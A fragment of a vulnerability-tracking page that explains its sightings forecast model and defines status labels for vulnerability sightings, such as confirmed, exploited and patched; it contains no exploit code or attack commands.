Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…